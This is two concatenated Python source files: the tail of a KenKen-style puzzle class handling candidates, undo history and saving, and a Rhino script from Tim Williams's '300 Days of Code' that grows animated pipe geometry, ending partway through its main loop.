            history.append( Update(upd.coords, upd.answer, upd.candidates) )
        return updates
    def annal(self, focus):
        # Snapshot the focus cell's current state (candidates copied).
        return Update(focus, self.answer[focus], self.candidates[focus][:])
    def propagate(self, focus, value):
        # When an answer is entered in a cell, eliminate that value as a
        # candidate in all cells in the same line.
        # In cases where that reduces then number of candidates to one,
        # enter the answer and recursively propagate it.
        # All changes are entered in the history.
        # A list of changes is returned
        candidates, answer = self.candidates, self.answer
        history, dim = self.history, self.dim
        x, y = focus
        updates = []
        ann = self.annal(focus)
        history.append(ann)
        answer[focus] = value
        updates.append(self.annal(focus))
        for k in range(1, dim+1):
            for coords in ( (x, k), (k, y) ):
                if answer[coords]:
                    continue
                cand = candidates[coords]
                if value not in cand:
                    continue
                if len(cand) == 2:
                    # the element != value equals sum(cand) - value
                    updates.extend(self.propagate(coords, sum(cand)-value))
                else:
                    ann = self.annal(coords)
                    history.append(ann)
                    candidates[coords].remove(value)
                    updates.append(self.annal(coords))
        return updates
    def allCandidates(self, focus):
        # Enter all possible candidates in cell given by focus
        # Ignore if answer already in cell
        # Enter transaction in history and return a list of updates
        history, dim, answer = self.history, self.dim, self.answer
        if answer[focus]:
            return []
        ann = self.annal(focus)
        self.isDirty = True
        history.append(Checkpoint())
        history.append(ann)
        # Start from every digit, then strip those answered on this line.
        cand = list(range(1, dim+1))
        x, y = focus
        for k in range(1, dim+1):
            try:
                cand.remove(answer[x, k])
            except ValueError:
                pass
            try:
                cand.remove(answer[k, y])
            except ValueError:
                pass
        if len(cand) != 1:
            self.candidates[focus] = cand
            update = self.annal(focus)
            return [update] # only one update
        else:
            # Exactly one possibility: enter it as the answer and propagate.
            updates = self.propagate(focus, cand[0])
            for upd in updates:
                history.append( Update(upd.coords, upd.answer, upd.candidates) )
            return updates
    def fillAllCandidates(self):
        # For each cell without an answer or any candidates, enter
        # all possible candidates
        # Enter transaction in history and return a list of updates
        candidates, answer, history = self.candidates, self.answer, self.history
        history.append(Checkpoint())          # assume there will be an update
        dirty = self.isDirty                  # save current state
        self.isDirty = True
        rng = list(range(1, self.dim+1))
        updates = []
        cells = [(x, y) for x in rng for y in rng]
        for cell in cells:
            if answer[cell] or candidates[cell]:
                continue
            ann = self.annal(cell)
            history.append(ann)
            cand = rng[:]
            x, y = cell
            for k in rng:
                try:
                    cand.remove(answer[x, k])
                except ValueError:
                    pass
                try:
                    cand.remove(answer[k, y])
                except ValueError:
                    pass
            if len(cand) != 1:
                self.candidates[cell] = cand
                update = self.annal(cell)
                updates.append(update)
            else:
                # Single possibility: enter as answer and propagate.
                ups = self.propagate(cell, cand[0])
                updates.extend(ups)
                for upd in ups:
                    history.append( Update(upd.coords, upd.answer, upd.candidates) )
        if not updates:
            history.pop()                     # remove the checkpoint
            self.isDirty = dirty              # restore state
        return updates
    def toggleCandidate(self, focus, value):
        # Ignore if answer already in focus cell.
        # Otherwise, toggle the candidate value on or off.
        # If the user attempts to enter a value that is already an
        # answer in the same line, raise CandidateError.
        # Enter transaction in history and return a list of updates
        history, dim, answer, candidates = (
            self.history, self.dim, self.answer, self.candidates)
        if answer[focus]:                     # answer present
            return []
        ann = self.annal(focus)
        if value in candidates[focus]:        # toggle value off
            self.isDirty = True
            history.append(Checkpoint())
            history.append(ann)
            candidates[focus].remove(value)
            update = self.annal(focus)
            return [update]                   # only one update
        conflicts = []                        # toggle value on --
        x, y = focus                          # check for conflicts
        for k in range(1, dim+1):
            for coords in ( (x, k), (k, y) ):
                if answer[coords] == value:
                    conflicts.append(coords)
        if conflicts:                         # conflict found
            raise CandidateError(conflicts)
        self.isDirty = True
        history.append(Checkpoint())          # no conflicts, toggle value on
        history.append(ann)
        candidates[focus].append(value)
        update = self.annal(focus)
        return [update]                       # only one update
    def getAllEntries(self):
        # Return a list of updates for all cell that have a value (answer or candidate).
        # Used for initializing the board, whether for one-cell cages or loading a
        # partially-completed solution.
        dim = self.dim
        answer, candidates = self.answer, self.candidates
        updates = []
        for j in range(1, dim+1):
            for k in range(1, dim+1):
                if answer[(j, k)] or candidates[(j, k)]:
                    updates.append(self.annal( (j, k) ))
        return updates
    def undo(self):
        # Undo items from the history until a checkpoint is encountered
        # Return a list of the updates made
        answer, candidates, history = self.answer, self.candidates, self.history
        try:
            ann = history.pop()
        except IndexError:                    # user tried one too many undos
            return []
        updates = []
        self.isDirty = True
        while not isinstance(ann, Checkpoint):
            coords = ann.coords
            answer[coords] = ann.answer
            candidates[coords] = ann.candidates
            updates.append(ann)
            ann = history.pop()
        return updates
    def clearCell(self, focus):
        # If there is an answer in the current cell clear it.
        # If there is no answer, clear the candidate list.
        # Return a list of updates
        answer, candidates, history = self.answer, self.candidates, self.history
        if not answer[focus] and not candidates[focus]:
            return []                         # nothing to clear
        ann = self.annal(focus)
        if answer[focus]:
            answer[focus] = 0
        else:
            candidates[focus] = []
        self.isDirty = True
        history.append(Checkpoint())
        history.append(ann)
        return [self.annal(focus)]
    def clearAllCandidates(self):
        # For each cell without an answer, clear all candidates
        # Enter transaction in history and return a list of updates
        candidates, answer, history = self.candidates, self.answer, self.history
        history.append(Checkpoint())          # assume there will be an update
        dirty = self.isDirty                  # save current state
        self.isDirty = True
        rng = range(1, self.dim+1)
        updates = []
        cells = [(x, y) for x in rng for y in rng]
        for cell in cells:
            if answer[cell] or not candidates[cell]:
                continue                      # nothing to clear
            ann = self.annal(cell)
            history.append(ann)
            candidates[cell] = []
            updates.append(self.annal(cell))
        if not updates:
            history.pop()                     # remove the checkpoint
            self.isDirty = dirty              # restore state
        return updates
    def checkAnswers(self):
        # Compare user's answers to solution, and return a list of errors
        dim, answer, solution = self.dim, self.answer, self.solution
        errors = []
        for x in range(1, dim+1):
            for y in range(1, dim+1):
                if answer[(x,y)] and answer[(x,y)] != solution[(x,y)]:
                    errors.append( (x,y) )
        return errors
    def isCompleted(self):
        # Has user entered an answer in each cell?
        return len([x for x in self.answer.values() if x]) == self.dim ** 2
    def save(self, fname):
        # Serialize the puzzle plus user progress in .kip format.
        dim = self.dim
        elapsedTime = self.parent.control.getTime()
        fout = open(fname, 'w')
        fout.write('# %s\n' % os.path.split(fname)[1])
        fout.write('# %s\n' % time.strftime("%A, %d %B %Y %H:%M:%S"))
        fout.write('dim %d\n' % dim)
        for c in self.cages:
            fout.write(str(c) + '\n')
        fout.write('#\nSolution\n')
        for row in range(1, dim+1):
            for col in range(1, dim+1):
                fout.write( '%d ' %self.solution[(row, col)] )
            fout.write('\n')
        fout.write('#\nAnswers\n')
        for row in range(1, dim+1):
            for col in range(1, dim+1):
                fout.write( '%d ' %self.answer[(row, col)] )
            fout.write('\n')
        fout.write('#\nCandidates\n')
        for row in range(1, dim+1):
            for col in range(1, dim+1):
                cand = self.candidates[(row, col)]
                cstr = ''.join([str(c) for c in cand])
                # '0' marks an empty candidate list in the file format.
                fout.write('%s ' % (cstr if cstr else '0') )
            fout.write('\n')
        fout.write('#\nHistory\n')
        for h in self.history:
            if isinstance(h, Checkpoint):
                fout.write('checkpoint\n')
            else:
                fout.write('%d%d ' % h.coords)
                fout.write('%d ' % h.answer)
                cstr = ''.join([str(c) for c in h.candidates])
                fout.write('%s\n' % (cstr if cstr else '0') )
        fout.write('#\nTime %d\n' % elapsedTime)
        fout.close()
    def restart(self):
        # Clear all user-entered data
        # User wants to start over
        dim = self.dim
        for i in range(1, dim+1):
            for j in range(1, dim+1):
                self.candidates[(i,j)] = []
                # Given answers (one-cell cages) are kept.
                if (i, j) not in self.oneCellCages:
                    self.answer[(i,j)] = 0
        self.history = []
    def goodAnswer(self, cage, focus, value):
        # Precondition: Every cell in cage, except focus, has an answer filled in
        # Return true iff filling value into focus makes the
        # arithmetic work out
        operands = [self.answer[x] for x in cage if x != focus]
        operands += [value]
        if cage.op == "ADD":
            return sum(operands) == cage.value
        if cage.op == "SUB":
            return max(operands) - min(operands) == cage.value
        if cage.op == "MUL":
            product = 1
            for x in operands:
                product *= x
            return product == cage.value
        if cage.op == "DIV":
            return max(operands) // min(operands) == cage.value
        if cage.op == "NONE":
            return operands[0] == cage.value
if __name__ == '__main__':
    # Puzzle requires an open file object (not a path string) and a parent
    # object; the original call passed a bare path and omitted `parent`,
    # which raised a TypeError. `parent` is only dereferenced for .kip
    # files, so None is acceptable for a .ken smoke test.
    with open('../docs/31May2009.ken') as fin:
        p = Puzzle(fin, None)
|
"""300 Days of Code
Sketches 201-300 by Tim Williams
"""
import Rhino as rc
import Rhino.Geometry as rg
import rhinoscriptsyntax as rs
import scriptcontext as sc
import math
import random
import os
import System.Drawing as drawing
import time
import datetime
import clr; clr.AddReference("Grasshopper")
import Grasshopper as gh
from itertools import combinations as cb
import itertools
import lib.color as color
import lib.mp4 as mp4
import lib.geometry as geo
import lib.util as util
import lib.perlin as perlin
import lib.region as region
class TempDisplay():
    """Temporary helper geometry (points/curves) added to the Rhino doc
    for visual debugging; Cleanup() deletes everything that was added.
    """
    def __init__(self, objs = [], color = drawing.Color.Gold):
        # NOTE(review): mutable default `objs=[]` is shared across calls;
        # it is only read here so it is harmless, but None would be safer.
        self.attr = rc.DocObjects.ObjectAttributes()
        self.attr.ColorSource = rc.DocObjects.ObjectColorSource.ColorFromObject
        self.attr.ObjectColor = color
        self.Enabled = True     # when False, Add() becomes a no-op
        self.guids = []         # ids of added objects, for Cleanup()
        if type(objs) != list:
            objs = [objs]       # allow a single object as well as a list
        self.Add(objs, color)
    def Add(self, objs, color = None):
        # Add points/curves to the document with this display's attributes.
        # NOTE(review): `color` and `oldColor` are currently unused here --
        # the objects take self.attr.ObjectColor as set in __init__.
        if self.Enabled == False: return
        oldColor = self.attr.ObjectColor
        if type(objs) != list:
            objs = [objs]
        for obj in objs:
            if type(obj) == rg.Point3d:
                self.guids.append(sc.doc.Objects.AddPoint(obj, self.attr))
            elif type(obj) == rg.LineCurve or type(obj) == rg.PolylineCurve:
                self.guids.append(sc.doc.Objects.AddCurve(obj, self.attr))
            else:
                print "Cannot add temp obj, type not supported"
    def Cleanup(self):
        # Delete every object this display added (quiet=True).
        for id in self.guids:
            sc.doc.Objects.Delete(id, True)
class Scene():
    """Handles to fixed scene geometry in the current Rhino document."""
    def __init__(self):
        # GUID of the pre-placed floor surface in the document.
        self.floorID = r'ec68de3f-0f6f-4c67-95e9-cb86d8a13d7e'
        self.floor = rs.coercesurface(self.floorID)
class HUD():
    """Heads-up display driven by pre-placed document objects.

    Updates text objects (sketch number, frame counter, three free-form
    parameter readouts) and stretches a progress-bar brep as frames pass.
    All GUIDs refer to objects expected to exist in the Rhino document.
    """
    def __init__(self, skNum, numFrames):
        self.numFrames = numFrames
        # GUIDs of the annotation objects in the document.
        self.skNumID = r'9307b2df-e6e2-4c74-8671-b350783d5ff0'
        self.textID = r'7bd51e90-2a02-4532-ab53-563ec9ad6351'
        self.param1ID = r'806cc725-66fb-4d1e-b58e-399232a82585'
        self.param2ID = r'0f1272f2-e148-44e6-8aad-6c4df5ddd485'
        self.param3ID = r'b5089d05-07b4-460c-ae65-8ffcb8b3e8f7'
        self.skNum = rs.coercerhinoobject(self.skNumID)
        self.param1 = rs.coercerhinoobject(self.param1ID)
        self.param2 = rs.coercerhinoobject(self.param2ID)
        self.param3 = rs.coercerhinoobject(self.param3ID)
        self.text = rs.coercerhinoobject(self.textID)
        self.progressBarID = r'e0ac605f-ff4d-471d-a5eb-65e1f8b6be94'
        self.progress = rs.coercerhinoobject(self.progressBarID).BrepGeometry
        # Scaling plane anchored at the bar's left edge so the bar grows
        # rightward only.
        self.plane = rg.Plane.WorldXY
        self.plane.Origin = rg.Point3d(5,100,85.913)
        self.skNum.Geometry.Text = 'sk'+str(skNum)
        self.skNum.CommitChanges()
        # Blank out the three parameter readouts until first update.
        self.param1.Geometry.Text = ' '
        self.param1.CommitChanges()
        self.param2.Geometry.Text = ' '
        self.param2.CommitChanges()
        self.param3.Geometry.Text = ' '
        self.param3.CommitChanges()
        # Normalize the progress bar to unit length before the run starts.
        bbox = self.progress.GetBoundingBox(rg.Plane.WorldXY)
        currLength = bbox.Max.X - bbox.Min.X
        xScale = 1 / currLength
        xform = rg.Transform.Scale(self.plane, xScale, 1, 1)
        self.progress.Transform(xform)
        sc.doc.Objects.Replace(rs.coerceguid(self.progressBarID), self.progress)
    def Update(self, frameNum):
        # Refresh the frame-counter text object.
        self.text.Geometry.Text = str(frameNum)
        self.text.CommitChanges()
    def UpdateParam1(self, paramData):
        self.param1.Geometry.Text = str(paramData)
        self.param1.CommitChanges()
    def UpdateParam2(self, paramData):
        self.param2.Geometry.Text = str(paramData)
        self.param2.CommitChanges()
    def UpdateParam3(self, paramData):
        self.param3.Geometry.Text = str(paramData)
        self.param3.CommitChanges()
    def UpdateScaleBar(self):
        # Stretch the bar by one frame's worth of length (total span 90
        # units over numFrames frames).
        stepSize = 90/self.numFrames
        self.progress = rs.coercerhinoobject(self.progressBarID).BrepGeometry
        bbox = self.progress.GetBoundingBox(rg.Plane.WorldXY)
        currLength = bbox.Max.X - bbox.Min.X
        xScale = (currLength + stepSize) / currLength
        xform = rg.Transform.Scale(self.plane, xScale, 1, 1)
        self.progress.Transform(xform)
        sc.doc.Objects.Replace(rs.coerceguid(self.progressBarID), self.progress)
######
class System():
    """Top-level simulation state for the sketch.

    Owns the 100x100x100 bounding box and a set of Pipe objects; each
    frame, dead pipes are replaced with fresh ones. The module-building
    code paths (AddModule/AddModule2) are retained from an earlier
    iteration and are not driven by Update() in this sketch.
    """
    def __init__(self):
        self.particles = []
        # World bounds: axis-aligned 100-unit cube converted to a brep so
        # it can be intersection-tested against grown geometry.
        self.boundary = rg.Box(rg.Plane.WorldXY, rg.Interval(0,100), rg.Interval(0,100), rg.Interval(0,100))
        self.boundary = self.boundary.ToBrep()
        initPlane = rg.Plane.WorldXY
        initPlane.Origin = rg.Point3d(50,50,50)
        self.majorBrep = rg.Brep()
        self.openPlanes = []        # growth fronts processed this frame
        self.deadPlanes = []        # fronts culled by the per-frame cap
        self.nextRoundPlanes = [initPlane]
        self.modules = []
        self.size = 1
        self.time = 0
        # Shared display attributes: per-object color and material.
        self.attr = rc.DocObjects.ObjectAttributes()
        self.attr.ColorSource = rc.DocObjects.ObjectColorSource.ColorFromObject
        self.attr.MaterialSource = rc.DocObjects.ObjectMaterialSource.MaterialFromObject
        grad = color.GetGradient(5)
        self.attr.ObjectColor = color.GradientOfColors(grad, 0)
        self.attr.ObjectColor = drawing.Color.White   # overrides the gradient pick
        index = sc.doc.Materials.Add()
        self.mat = sc.doc.Materials[index]
        self.mat.DiffuseColor = self.attr.ObjectColor
        self.mat.CommitChanges()
        self.attr.MaterialIndex = index
        self.pipes = []
        for i in range(1):
            self.pipes.append(Pipe(self))
    def Update(self, time):
        # Advance one frame: rotate the growth-front lists, step every
        # live pipe, and respawn a new pipe for each one that died.
        self.time = time
        self.openPlanes = self.nextRoundPlanes
        random.shuffle(self.openPlanes)
        # Cap active fronts at 8 per frame; the rest are retired.
        openPlanes = self.openPlanes[:8]
        self.deadPlanes = self.openPlanes[8:]
        self.openPlanes = openPlanes
        self.nextRoundPlanes = []
        planesToRemove = []
        #size = util.Remap(self.time, 0,150,5,1)
        numToAdd = 0
        pipesToRemove = []
        for pipe in self.pipes:
            if pipe.alive:
                pipe.Update(time)
            if pipe.alive == False:
                pipesToRemove.append(pipe)
        for pipe in self.pipes:
            if pipe.alive:
                pipe.UpdateDisplay()
        # Replace each dead pipe with a brand-new one (dead pipes stay in
        # the list but are skipped by the alive checks above).
        for pipe in pipesToRemove:
            self.pipes.append(Pipe(self))
        #for plane in self.openPlanes:
        #    planesToRemove.append(plane)
        #    #self.AddModule(plane, size)
        #    self.AddModule2(plane, self.size)
        #for plane in planesToRemove:
        #    self.openPlanes.remove(plane)
        #for plane in self.deadPlanes:
        #    sc.doc.Objects.AddSphere(rg.Sphere(plane, self.size), self.attr)
    def UpdateDisplay(self):
        pass
    def AddModule(self, plane, size):
        # Try up to 10 times to place a random pipe module (straight,
        # angle, or T) at `plane` without leaving the boundary or
        # over-intersecting existing geometry; give up and retire the
        # plane otherwise.
        safety = 0
        while True:
            safety += 1
            if safety > 10:
                self.deadPlanes.append(plane)
                return
            mod = Module(size)
            case = random.randint(0,2)
            if self.time < 5:
                case = 0    # force straight segments early on
            if case == 0:
                mod.CreateStraight()
            elif case == 1:
                mod.CreateAngle()
            elif case == 2:
                mod.CreateT()
            originPlane = rg.Plane.WorldXY
            # Random quarter-turn around Z before mapping onto the target plane.
            rot = random.randint(0,3) * 90
            #rot = random.uniform(0,360)
            rotXform = rg.Transform.Rotation(math.radians(rot), rg.Vector3d(0,0,1), rg.Point3d(0,0,0))
            originPlane.Transform(rotXform)
            xform = rg.Transform.PlaneToPlane(originPlane, plane)
            mod.geo.Transform(xform)
            results = rg.Intersect.Intersection.BrepBrep(mod.geo, self.boundary, sc.doc.ModelAbsoluteTolerance)
            if len(results[1]) == 0:
                results = rg.Intersect.Intersection.BrepBrep(mod.geo, self.majorBrep, sc.doc.ModelAbsoluteTolerance)
                if len(results[1]) < 2:
                    sc.doc.Objects.AddBrep(mod.geo, self.attr)
                    # Carry the module's exit planes into the next round.
                    ends = mod.planeEnds[:]
                    for end in ends:
                        end.Transform(xform)
                    self.nextRoundPlanes += ends
                    self.majorBrep.Append(mod.geo)
                    return
    def AddModule2(self, plane, size):
        # Alternative growth: sweep a circle along a random quadratic arc
        # from `plane`; occasionally branch into two arcs.
        numObjects = 1
        if random.randint(0,4) == 0:
            numObjects = 2
        for i in range(numObjects):
            #Rotate base plane
            plane.Rotate(math.radians(random.uniform(0,360)), plane.Normal)
            #Construct new arc
            length = 4
            vec = plane.Normal
            vec *= length
            pt0 = plane.Origin
            pt1 = rg.Point3d.Add(pt0, vec)
            vec.Rotate(math.radians(random.uniform(-120,120)), plane.XAxis)
            vec.Unitize()
            vec *= length
            pt2 = rg.Point3d.Add(pt1, vec)
            nurb = rg.NurbsCurve.Create(False, 2, [pt0, pt1, pt2])
            tan = nurb.TangentAt(1)
            circ = rg.Circle(plane, self.size)
            circ = circ.ToNurbsCurve()
            sweep = rg.SweepOneRail()
            geo = sweep.PerformSweep(nurb, circ)[0]
            # Only keep geometry fully inside the boundary (no intersection).
            results = rg.Intersect.Intersection.BrepBrep(geo, self.boundary, sc.doc.ModelAbsoluteTolerance)
            if len(results[1]) == 0:
                endPlane = [rg.Plane(pt2, tan)]
                sc.doc.Objects.AddBrep(geo, self.attr)
                self.nextRoundPlanes += endPlane
class Pipe():
    """A growing tube that starts near the floor, wanders upward as a
    chain of swept arcs, joins onto another pipe when it wanders close
    enough, and dies when it can no longer grow.
    """
    def __init__(self, system, vec = None):
        self.system = system
        self.majorBrep = rg.Brep()
        self.alive = True
        self.age = 0
        self.history = []       # circles swept so far
        self.segments = []      # Segment objects (for per-frame thickening)
        #Movement
        #self.vel = rg.Vector3d(random.uniform(-1,1),random.uniform(-1,1), random.uniform(-.2,.2))
        #self.vel.Unitize()
        #self.size = random.uniform(1, 3)
        self.size = .1          # tube radius
        self.length = .75       # arc segment length
        #Color and Material
        self.attr = rc.DocObjects.ObjectAttributes()
        self.attr.ColorSource = rc.DocObjects.ObjectColorSource.ColorFromObject
        #self.grad = color.GetGradient(random.randint(0,9))
        self.grad = color.GetGradient(4)
        #col = drawing.Color.AliceBlue
        col = color.GradientOfColors(self.grad, random.uniform(0,1))
        self.attr.MaterialSource = rc.DocObjects.ObjectMaterialSource.MaterialFromObject
        self.attr.ObjectColor = col
        index = sc.doc.Materials.Add()
        self.mat = sc.doc.Materials[index]
        self.mat.DiffuseColor = self.attr.ObjectColor
        self.mat.CommitChanges()
        self.attr.MaterialIndex = index
        #Position: random spot just above the floor, growing straight up.
        self.pos = rg.Point3d(random.uniform(5,95), random.uniform(5,95), .1)
        #self.pos = rg.Point3d(50, 50, 99)
        self.dir = rg.Vector3d(0,0,1)
        initPlane = rg.Plane.WorldXY
        initPlane.Origin = self.pos
        initPlane = rg.Plane(self.pos, self.dir)
        self.openPlanes = []
        self.planesToRemove = []
        self.nextRoundPlanes = [initPlane]
        self.crv = None
        self.crvs = rc.Collections.CurveList()  # centerlines, for join tests
        self.pts = []
        self.ids = []
        # Seed sphere marking the pipe's origin.
        sc.doc.Objects.AddSphere(rg.Sphere(self.pos, self.size), self.attr)
    def Update(self, time):
        # Grow one arc segment from each active front plane (capped at 8).
        self.time = time
        self.age += 1
        #self.size = util.Remap(self.age, 0, 150, .1, 5)
        self.openPlanes = self.nextRoundPlanes
        random.shuffle(self.openPlanes)
        openPlanes = self.openPlanes[:8]
        self.deadPlanes = self.openPlanes[8:]
        self.openPlanes = openPlanes
        self.nextRoundPlanes = []
        planesToRemove = []
        for plane in self.openPlanes:
            #Rotate base plane
            plane.Rotate(math.radians(random.uniform(0,360)), plane.Normal)
            #Construct new arc
            vec = plane.Normal
            vec *= self.length
            pt0 = plane.Origin
            pt1 = rg.Point3d.Add(pt0, vec)
            # Look for a nearby centerline of another pipe; if one is
            # within 2 segment-lengths, terminate by joining onto it.
            closestDist = None
            closestPt = None
            for otherPipe in self.system.pipes:
                if otherPipe is self: continue
                for eachCrv in otherPipe.crvs:
                    result, param = eachCrv.ClosestPoint(pt1, 20)
                    if result:
                        closePt = eachCrv.PointAt(param)
                        d = rs.Distance(pt1, closePt)
                        if d < self.length*2:
                            if d < closestDist or closestDist is None:
                                closestDist = d
                                closestPt = closePt
            if closestPt:
                pt2 = closestPt
                self.alive = False
                #print "Joined"
            else:
                #vec.Rotate(math.radians(random.uniform(-90,90)), plane.XAxis)
                # Otherwise jitter the direction slightly, retrying (up to
                # 10 times) while the endpoint is within 5 units of the
                # boundary once the pipe is old enough.
                safety = 0
                while True:
                    safety += 1
                    if safety > 10:
                        break
                    vec.Rotate(math.radians(random.uniform(-5,5)), plane.XAxis)
                    vec.Unitize()
                    vec *= self.length
                    pt2 = rg.Point3d.Add(pt1, vec)
                    if self.age > 5:
                        results = self.system.boundary.ClosestPoint(pt2, 20)
                        if results[0]:
                            d = rs.Distance(pt2, results[1])
                            if d < 5:
                                continue
                            else:
                                break
            # Sweep the tube cross-section along the new arc.
            nurb = rg.NurbsCurve.Create(False, 2, [pt0, pt1, pt2])
            tan = nurb.TangentAt(1)
            circ = rg.Circle(plane, self.size)
            circNurb = circ.ToNurbsCurve()
            sweep = rg.SweepOneRail()
            geo = sweep.PerformSweep(nurb, circNurb)[0]
            # Keep the segment only if it stays inside the world box.
            results = rg.Intersect.Intersection.BrepBrep(geo, self.system.boundary, sc.doc.ModelAbsoluteTolerance)
            if len(results[1]) == 0:
                self.pts.append(pt1)
                self.pts.append(pt2)
                self.crvs.Add(nurb)
                self.history.append(circ)
                self.segments.append(Segment(self, circ, plane, nurb, self.size))
                endPlane = [rg.Plane(pt2, tan)]
                self.nextRoundPlanes += endPlane
        for plane in planesToRemove:
            self.openPlanes.remove(plane)
        for plane in self.deadPlanes:
            sc.doc.Objects.AddSphere(rg.Sphere(plane, self.size), self.attr)
        # No viable growth fronts left: the pipe dies, capped with a sphere.
        if len(self.nextRoundPlanes) == 0:
            self.alive = False
            sc.doc.Objects.AddSphere(rg.Sphere(plane.Origin, self.size), self.attr)
    def UpdateDisplay(self):
        # Re-sweep each segment at its grown radius.
        for segment in self.segments:
            segment.UpdateDisplay()
class Segment():
    """One swept arc of a Pipe.

    Each frame, UpdateDisplay() enlarges the cross-section circle and
    re-sweeps it along the stored path, replacing the previous brep in
    the document, so older segments appear progressively thicker.
    """
    def __init__(self, parent, circ, plane, path, size):
        self.size = size        # current cross-section radius
        self.parent = parent    # owning Pipe (supplies display attributes)
        self.circ = circ        # cross-section circle (mutated as it grows)
        self.plane = plane      # base plane; its origin anchors the scaling
        self.path = path        # rail curve for the sweep
        self.id = None          # GUID of the last brep added to the doc
    def UpdateDisplay(self):
        # Remove the previous sweep before adding the thicker replacement.
        if self.id:
            sc.doc.Objects.Delete(self.id, True)
        growthRate = .1
        # Uniformly scale the circle about the plane origin so the new
        # radius equals size + growthRate.
        xform = rg.Transform.Scale(self.plane.Origin, (self.size + growthRate) / self.size)
        self.size += growthRate
        self.circ.Transform(xform)
        newCircNurb = self.circ.ToNurbsCurve()
        sweep = rg.SweepOneRail()
        geo = sweep.PerformSweep(self.path, newCircNurb)[0]
        self.id = sc.doc.Objects.AddBrep(geo, self.parent.attr)
class Module():
    """A pipe building block: straight, 90-degree elbow, U-turn, or T.

    Geometry is built in world coordinates at the origin; `planeEnds`
    collects exit planes so the caller can chain further modules.
    Each instance gets a random named color/material.
    """
    def __init__(self, size):
        self.planeStart = rg.Plane.WorldXY
        self.geo = None
        self.cylinderGeo = None
        self.angleGeo = None
        self.uTurnGeo = None
        self.geoID = None
        self.size = size            # cross-section diameter
        self.length = size*1.5      # segment length / bend radius
        # A square section is built first, then immediately replaced by a
        # circle (the square path appears to be leftover from iteration).
        self.sec = rg.Rectangle3d(self.planeStart, rg.Interval(-self.size/2, self.size/2), rg.Interval(-self.size/2, self.size/2))
        self.sec = self.sec.ToNurbsCurve()
        self.sec.Reverse()
        self.sec = rg.Circle(rg.Plane.WorldXY, self.size/2)
        self.sec = self.sec.ToNurbsCurve()
        self.sec.Reverse()
        self.attr = rc.DocObjects.ObjectAttributes()
        self.attr.ColorSource = rc.DocObjects.ObjectColorSource.ColorFromObject
        self.attr.MaterialSource = rc.DocObjects.ObjectMaterialSource.MaterialFromObject
        col = color.GetRandomNamedColor()
        self.attr.ObjectColor = col
        index = sc.doc.Materials.Add()
        self.mat = sc.doc.Materials[index]
        self.mat.DiffuseColor = self.attr.ObjectColor
        self.mat.CommitChanges()
        self.attr.MaterialIndex = index
        self.planeEnds = []         # exit planes for chaining modules
    def CreateNurbs(self):
        pass
    def CreateStraight(self):
        # Straight tube along +Z; one exit plane at the far end.
        pt = rg.Point3d(0,0,self.length)
        planeEnd = rg.Plane.WorldXY
        planeEnd.Origin = pt
        self.planeEnds.append(planeEnd)
        self.geo = rg.Extrusion.Create(self.sec, -self.length, True)
        self.geo = self.geo.ToBrep(False)
    def CreateAngle(self):
        # Quarter-circle elbow from +Z toward +X; exit plane faces sideways.
        pt = rg.Point3d(self.length, 0, self.length)
        planeEnd = rg.Plane.WorldYZ
        planeEnd.Origin = pt
        self.planeEnds.append(planeEnd)
        centerPt = rg.Point3d(self.length, 0, 0)
        origin = rg.Point3d(0,0,0)
        centerPlane = rg.Plane(centerPt, origin, pt)
        circ = rg.Circle(centerPlane, self.length)
        arc = rg.Arc(circ, math.pi*.5)
        arc = arc.ToNurbsCurve()
        sweep = rg.SweepOneRail()
        self.geo = sweep.PerformSweep(arc, self.sec)[0]
    def CreateUturn(self):
        # Half-circle bend returning parallel to the entry direction.
        xDir = rg.Vector3d(-1,0,0)
        yDir = rg.Vector3d(0,1,0)
        planeEnd = rg.Plane(rg.Point3d(self.length*2, 0, 0), xDir, yDir)
        self.planeEnds.append(planeEnd)
        pt = rg.Point3d(self.length,0,self.length)
        centerPt = rg.Point3d(self.length, 0, 0)
        origin = rg.Point3d(0,0,0)
        centerPlane = rg.Plane(centerPt, origin, pt)
        circ = rg.Circle(centerPlane, self.length)
        arc = rg.Arc(circ, math.pi)
        arc = arc.ToNurbsCurve()
        sweep = rg.SweepOneRail()
        self.geo = sweep.PerformSweep(arc, self.sec)[0]
    def CreateT(self):
        # T junction: a straight run unioned with a perpendicular stub;
        # two exit planes, mirrored by a 180-degree rotation.
        geo0 = rg.Extrusion.Create(self.sec, -self.length + self.length/2, True)
        geo0 = geo0.ToBrep(False)
        # NOTE(review): this swept elbow (geo1) is built and then
        # overwritten by the extrusion below -- apparently dead code.
        sweepCenterPt = rg.Point3d(self.length, 0, 0)
        origin = rg.Point3d(0,0,0)
        pt = rg.Point3d(self.length, 0, self.length)
        centerPlane = rg.Plane(sweepCenterPt, origin, pt)
        circ = rg.Circle(centerPlane, self.length)
        arc = rg.Arc(circ, math.pi*.5)
        arc = arc.ToNurbsCurve()
        sweep = rg.SweepOneRail()
        geo1 = sweep.PerformSweep(arc, self.sec)[0]
        geo1 = geo1.CapPlanarHoles(sc.doc.ModelAbsoluteTolerance)
        rotXform = rg.Transform.Rotation(math.radians(180), rg.Vector3d(0,0,1), rg.Point3d(0,0,0))
        pt = rg.Point3d(self.size/2, 0, self.length/2)
        planeEnd = rg.Plane.WorldYZ
        planeEnd.Origin = pt
        self.planeEnds.append(planeEnd)
        pt = rg.Point3d(self.size/2, 0, self.length/2)
        planeEnd = rg.Plane.WorldYZ
        planeEnd.Origin = pt
        planeEnd.Transform(rotXform)
        self.planeEnds.append(planeEnd)
        planeXform = rg.Transform.PlaneToPlane(rg.Plane.WorldXY, planeEnd)
        tempCirc = self.sec.Duplicate()
        tempCirc.Transform(planeXform)
        geo1 = rg.Extrusion.Create(tempCirc, self.size, True)
        geo1 = geo1.ToBrep(False)
        union = rg.Brep()
        results = union.CreateBooleanUnion([geo0, geo1], sc.doc.ModelAbsoluteTolerance)
        self.geo = results[0]
####
def main():
skNum = (datetime.date.today()-datetime.date(2020, 03, 29)).days + 201
if int(skNum) > int(os.path.splitext(os.path.basename(__file__))[0]):
print "!!!!SAVE THE SKETCH WITH A NEW NAME!!!!"
rs.UnselectAllObjects()
init_time = time.time()
version = 'a'
anim = mp4.Animation(os.path.splitext(os.path.basename(__file__))[0] + version)
numFrames = 150
numPasses = 100
anim.fps = 30
td = TempDisplay()
display = HUD(os.path.splitext(os.path.basename(__file__))[0], numFrames)
s = Scene()
################################
#SETUP
pSystem = System()
################################
for i in range(numFrames):
start_time = time.time()
print "Frame {}".format(i)
if sc.escape_test(False): anim.Cleanup(); return
################################
#MAIN LOOP
if random.randint(0,20) == 0:
pSystem.pipes.append(Pipe(pSystem))
pSystem.Update(i)
################################
